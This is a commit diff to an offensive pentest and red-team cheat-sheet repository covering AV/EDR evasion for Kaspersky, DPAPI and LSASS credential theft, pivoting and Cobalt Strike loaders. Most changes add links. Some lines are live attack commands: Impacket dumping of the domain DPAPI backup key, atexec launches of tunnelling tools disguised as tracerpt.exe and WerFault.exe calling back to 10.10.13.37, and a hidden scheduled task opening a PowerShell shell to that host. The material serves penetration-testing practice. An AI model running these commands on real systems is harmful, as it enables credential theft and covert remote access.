[AHK] Automatic update 👽

SUMMARY.md

@@ -29,13 +29,13 @@
       - [Defender](pentest/infrastructure/ad/av-edr-evasion/defender.md)
       - [ETW Block](pentest/infrastructure/ad/av-edr-evasion/etw-block.md)
       - [Execution Policy Bypass](pentest/infrastructure/ad/av-edr-evasion/executionpolicy-bypass.md)
-      - [KIS / KES](pentest/infrastructure/ad/av-edr-evasion/kis-kes.md)
+      - [KIS / KES](pentest/infrastructure/ad/av-edr-evasion/kes-ksc.md)
       - [Mimikatz](pentest/infrastructure/ad/av-edr-evasion/mimikatz.md)
       - [UAC Bypass](pentest/infrastructure/ad/av-edr-evasion/uac-bypass.md)
     * [Authentication Coercion](pentest/infrastructure/ad/authentication-coercion.md)
     * [Credentials Harvesting](pentest/infrastructure/ad/credential-harvesting/README.md)
       - [From Memory](pentest/infrastructure/ad/credential-harvesting/from-memory/README.md)
-        * [lsass.exe](pentest/infrastructure/ad/credential-harvesting/from-memory/lsass-exe.md)
+        * [lsass.exe](pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md)
         * [svchost.exe](pentest/infrastructure/ad/credential-harvesting/from-memory/svchost-exe.md)
       - [Credential Phishing](pentest/infrastructure/ad/credential-harvesting/credential-phishing.md)
       - [DCSync](pentest/infrastructure/ad/credential-harvesting/dcsync.md)
@@ -104,7 +104,7 @@
     * [Zabbix](pentest/infrastructure/devops/zabbix.md)
   - [DBMS](pentest/infrastructure/dbms/README.md)
     * [FireBird](pentest/infrastructure/dbms/firebird.md)
-    * [MS SQL](pentest/infrastructure/dbms/mssql.md)
+    * [MS SQL](pentest/infrastructure/dbms/ms-sql.md)
     * [MySQL / MariaDB](pentest/infrastructure/dbms/mysql-mariadb.md)
     * [Oracle](pentest/infrastructure/dbms/oracle.md)
     * [Redis](pentest/infrastructure/dbms/redis.md)
@@ -178,6 +178,8 @@
 ## ⚔️ Red Team
 
 * [Basics](redteam/basics.md)
+* [Cobalt Strike](redteam/cobalt-strike/README.md)
+  - [UDRL](redteam/maldev/udrl.md)
 * [Cobalt Strike](redteam/cobalt-strike.md)
 * [Infrastructure](redteam/infrastructure.md)
 * [Malware Development](redteam/maldev/README.md)
@@ -196,7 +198,6 @@
   - [Sandbox Evasion](redteam/maldev/sandbox-evasion.md)
   - [Shellcodes](redteam/maldev/shellcodes.md)
   - [Syscalls](redteam/maldev/syscalls.md)
-  - [UDRL](redteam/maldev/udrl.md)
   - [Windows API](redteam/maldev/winapi.md)
 * [SE](redteam/se/README.md)
   - [Phishing](redteam/se/phishing/README.md)

pentest/infrastructure/ad/README.md

@@ -78,6 +78,7 @@
 ## The Path to DA
 
 - [https://shorsec.io/blog/the-path-to-da-part-1-sysadmins-love-generic-passwords/](https://shorsec.io/blog/the-path-to-da-part-1-sysadmins-love-generic-passwords/)
+- [https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/](https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/)
 
 
 

pentest/infrastructure/ad/ad-cs-abuse/README.md

@@ -313,9 +313,7 @@ Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:User /onbeh
 
 ### Vulnerable PKI Object ACEs (ESC5)
 
-```
-...
-```
+- [https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)
 
 
 

pentest/infrastructure/ad/av-edr-evasion/kis-kes.md → pentest/infrastructure/ad/av-edr-evasion/kes-ksc.md

@@ -1,27 +1,21 @@
 ---
-description: Kaspersy Internet Security (KIS) / Kaspersky Endpoint Security (KES)
+description: Kaspersy Internet Security (KIS) / Kaspersky Endpoint Security (KES) / Kaspersky Security Center (KSC)
 ---
 
-# KIS / KES
+# KIS / KES / KSC
 
 - [https://api-router.kaspersky-labs.com/downloads/search/v3/b2b](https://api-router.kaspersky-labs.com/downloads/search/v3/b2b?productcode=2911379&sites=https%3A%2F%2Fwww.kaspersky.com)
-- [https://www.exploit-db.com/docs/english/40433-deactivating-endpoint-protection-software-in-an-unauthorized-manner-(revisited).pdf](https://www.exploit-db.com/docs/english/40433-deactivating-endpoint-protection-software-in-an-unauthorized-manner-(revisited).pdf)
-- [https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea](https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea)
-
-
 
 
-## KlScSvc in LSA
 
-- [https://telegra.ph/Crackmapexec-beryot-sluzhebnyj-parol-konsoli-Kaspersky-Security-Center-12-08](https://telegra.ph/Crackmapexec-beryot-sluzhebnyj-parol-konsoli-Kaspersky-Security-Center-12-08)
-- [https://www.kaspersky.ru/small-to-medium-business-security/downloads/endpoint](https://www.kaspersky.ru/small-to-medium-business-security/downloads/endpoint)
 
-{% embed url="https://twitter.com/snovvcrash/status/1494660022583840774" %}
+## KIS / KES
 
+- [https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea](https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea)
 
 
 
-## Scan Exclusions
+### Scan Exclusions
 
 Potential scan exclusions:
 
@@ -32,8 +26,9 @@ Potential scan exclusions:
 
 
 
+### Stop Service
 
-## Stop Service
+- [https://www.exploit-db.com/docs/english/40433-deactivating-endpoint-protection-software-in-an-unauthorized-manner-(revisited).pdf](https://www.exploit-db.com/docs/english/40433-deactivating-endpoint-protection-software-in-an-unauthorized-manner-(revisited).pdf)
 
 Check if KES Self-Defense is enabled:
 
@@ -57,8 +52,34 @@ Cmd > klpsm.exe start_avp_service
 
 
 
-
-## Remove Product
+### Remove Product
 
 - [https://support.kaspersky.com/common/uninstall/1464](https://support.kaspersky.com/common/uninstall/1464)
 - [https://support.kaspersky.com/14674](https://support.kaspersky.com/14674)
+
+
+
+
+## KSC
+
+- [https://www.kaspersky.ru/small-to-medium-business-security/downloads/endpoint](https://www.kaspersky.ru/small-to-medium-business-security/downloads/endpoint)
+
+Default MMC port (useful for forwarding) - `13291`
+
+
+
+### Enumeration
+
+```
+Cmd > netstat -ano | findstr 13000
+Cmd > "C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagchk.exe"
+Cmd > reg query HKLM\SOFTWARE\WOW6432Node\KasperskyLab\Components /s /v Protection_AdmServer
+```
+
+
+
+### KlScSvc in LSA
+
+- [https://telegra.ph/Crackmapexec-beryot-sluzhebnyj-parol-konsoli-Kaspersky-Security-Center-12-08](https://telegra.ph/Crackmapexec-beryot-sluzhebnyj-parol-konsoli-Kaspersky-Security-Center-12-08)
+
+{% embed url="https://twitter.com/snovvcrash/status/1494660022583840774" %}

pentest/infrastructure/ad/credential-harvesting/dpapi.md

@@ -47,6 +47,19 @@ mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
 
 
 
+## Impacket
+
+Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs:
+
+```
+$ dpapi.py backupkeys --export -k -no-pass -t DC01.megacorp.local
+$ dpapi.py masterkey -file ./Users/Administrator/AppData/Roaming/Microsoft/Protect/<SID>/00ff00ff-00ff-00ff-00ff-00ff00ff00ff -pvk 'G$BCKUPKEY_<GUID>.pvk
+$ dpapi.py credential -file ./Users/Administrator/AppData/Roaming/Microsoft/Credentials/00ff00ff00ff00ff00ff00ff00ff00ff -key 0x<HEX_MASTER_KEY>
+```
+
+
+
+
 ## SharpDPAPI
 
 * [https://github.com/GhostPack/SharpDPAPI#table-of-contents](https://github.com/GhostPack/SharpDPAPI#table-of-contents)
@@ -64,7 +77,7 @@ Triage machine's credentials (*machinecredentials*), vaults (*machinevaults*) an
 PS > .\SharpDPAPI.exe machinetriage
 ```
 
-Retrieve the domain DPAPI backup key (never changes) from a DC and decrypt master key blobs for any user in the domain with it (needs DA privileges):
+Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs for any user in the domain with it (needs DA privileges):
 
 ```
 PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]

pentest/infrastructure/ad/credential-harvesting/from-memory/lsass-exe.md → pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md

@@ -2,7 +2,7 @@
 description: Local Security Authority Subsystem Service
 ---
 
-# lsass.exe
+# LSASS
 
 - [https://s3cur3th1ssh1t.github.io/Reflective-Dump-Tools/](https://s3cur3th1ssh1t.github.io/Reflective-Dump-Tools/)
 - [https://redteamrecipe.com/50-Methods-For-Dump-LSASS/](https://redteamrecipe.com/50-Methods-For-Dump-LSASS/)
@@ -53,6 +53,7 @@ shutdown -r -t 0
 - [https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump](https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump)
 - [https://github.com/w1u0u1/minidump](https://github.com/w1u0u1/minidump)
 - [https://github.com/helpsystems/nanodump/blob/main/source/nanodump.c](https://github.com/helpsystems/nanodump/blob/main/source/nanodump.c)
+- [https://github.com/YOLOP0wn/POSTDump/tree/main/POSTDump/POSTMiniDump](https://github.com/YOLOP0wn/POSTDump/tree/main/POSTDump/POSTMiniDump)
 
 
 

pentest/infrastructure/ad/lateral-movement/rdp.md

@@ -43,6 +43,7 @@ PS > New-NetFirewallRule -DisplayName 'Allow Remote Desktop' -Profile @('Domain'
 * [https://labs.f-secure.com/blog/undisable/](https://labs.f-secure.com/blog/undisable/)
 * [https://shellz.club/pass-the-hash-with-rdp-in-2019/](https://shellz.club/pass-the-hash-with-rdp-in-2019/)
 * [https://github.com/GhostPack/RestrictedAdmin](https://github.com/GhostPack/RestrictedAdmin)
+* [https://www.pentestpartners.com/security-blog/abusing-rdps-remote-credential-guard-with-rubeus-ptt/](https://www.pentestpartners.com/security-blog/abusing-rdps-remote-credential-guard-with-rubeus-ptt/)
 
 RDP with [PtH](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/): RDP needs a plaintext password unless Restricted Admin mode is enabled.
 

pentest/infrastructure/ad/smb.md

@@ -113,8 +113,8 @@ PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t
 ## Hunt for Shares & Content
 
 - [https://github.com/blacklanternsecurity/MANSPIDER](https://github.com/blacklanternsecurity/MANSPIDER)
-- [https://github.com/mitchmoser/SharpShares](https://github.com/mitchmoser/SharpShares)
 - [https://github.com/SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)
+- [https://github.com/mitchmoser/SharpShares](https://github.com/mitchmoser/SharpShares)
 - [https://github.com/punk-security/SMBeagle](https://github.com/punk-security/SMBeagle)
 - [https://github.com/p0dalirius/FindUncommonShares](https://github.com/p0dalirius/FindUncommonShares)
 

pentest/infrastructure/dbms/mssql.md → pentest/infrastructure/dbms/ms-sql.md

@@ -573,3 +573,10 @@ PS > Invoke-SQLAudit -Instance WEB01 -Username sa -Password 'Passw0rd!' -Verbose
 ### ESC
 
 * [https://github.com/NetSPI/ESC](https://github.com/NetSPI/ESC)
+
+
+
+### SQLRecon
+
+- [https://github.com/skahwah/SQLRecon](https://github.com/skahwah/SQLRecon)
+- [https://github.com/Tw1sm/PySQLRecon](https://github.com/Tw1sm/PySQLRecon)

pentest/infrastructure/networks/scanning.md

@@ -193,7 +193,7 @@ Scan with `nc`:
 
 ```
 $ seq 1 49151 | xargs -n1 | xargs -P0 -I {} nc -nzv -w1 0.0.0.0 {} 2>&1 | grep -vE "timed out|now in progress|Connection refused"
-$ for i in `seq 1 255`; do proxy nc -nvzw1 192.168.1.$i 445 |& grep open | tee -a 192.168.1.0_445.txt; sleep 1; done
+$ for i in `prips 192.168.1.0/24`; do proxy nc -nvzw1 $i 445 |& grep open | tee -a "${i}_445.txt"; sleep 1; done
 ```
 
 Top TCP ports:

pentest/infrastructure/pivoting.md

@@ -326,6 +326,7 @@ $ sshuttle -vr snovvcrash@10.10.13.37 192.168.1.0/24 -e "ssh -i ./key"
 - [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases)
 - [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel)
 - [https://gist.github.com/freshwind2004/c827e742285cdb9542403ff021486bb0](https://gist.github.com/freshwind2004/c827e742285cdb9542403ff021486bb0)
+- [https://www.syonsecurity.com/post/devtunnels-for-c2](https://www.syonsecurity.com/post/devtunnels-for-c2)
 
 {% content-ref url="/redteam/maldev/golang.md#garble" %}
 [golang.md](golang.md)
@@ -373,9 +374,9 @@ alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth sn
 Quicky:
 
 ```
-$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
+$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
 $ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks
-$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
+$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
 ```
 
 
@@ -427,8 +428,9 @@ $ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!
 Quicky:
 
 ```
-$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
-$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
+$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
+$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
+// or get proc image first to make sure you're killing the right proc and kill by pid -- 'wmic process where "name='"'"'WerFault.exe'"'"'" get ProcessID, ExecutablePath'
 ```
 
 

pentest/infrastructure/ssh.md

@@ -7,3 +7,11 @@ description: Secure Shell
 - [https://blog.lexfo.fr/sshimpanzee.html](https://blog.lexfo.fr/sshimpanzee.html)
 - [https://github.com/lexfo/sshimpanzee](https://github.com/lexfo/sshimpanzee)
 - [https://github.com/ssh-mitm/ssh-mitm](https://github.com/ssh-mitm/ssh-mitm)
+
+
+
+
+## Portable Clients
+
+- [https://github.com/xct/winssh](https://github.com/xct/winssh)
+- [https://github.com/NHAS/reverse_ssh](https://github.com/NHAS/reverse_ssh)

pentest/shells/reverse-shells.md

@@ -325,9 +325,3 @@ $settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue
 $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
 Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action
 ```
-
-
-
-### winssh
-
-- [https://github.com/xct/winssh](https://github.com/xct/winssh)

redteam/maldev/udrl.md → redteam/cobalt-strike/udrl.md

@@ -6,3 +6,4 @@ description: User-Defined Reflective Loader
 
 - [https://securityintelligence.com/posts/defining-cobalt-strike-reflective-loader/](https://securityintelligence.com/posts/defining-cobalt-strike-reflective-loader/)
 - [https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-1-simplifying-development/](https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-1-simplifying-development/)
+- [https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-2-obfuscation-masking](https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-2-obfuscation-masking)

redteam/maldev/code-injection/README.md

@@ -3,6 +3,7 @@
 - [https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)
 - [https://blog.xpnsec.com/weird-ways-to-execute-dotnet/](https://blog.xpnsec.com/weird-ways-to-execute-dotnet/)
 - [https://gitlab.com/users/ORCA666/projects](https://gitlab.com/users/ORCA666/projects)
+- [https://github.com/itaymigdal/awesome-injection](https://github.com/itaymigdal/awesome-injection)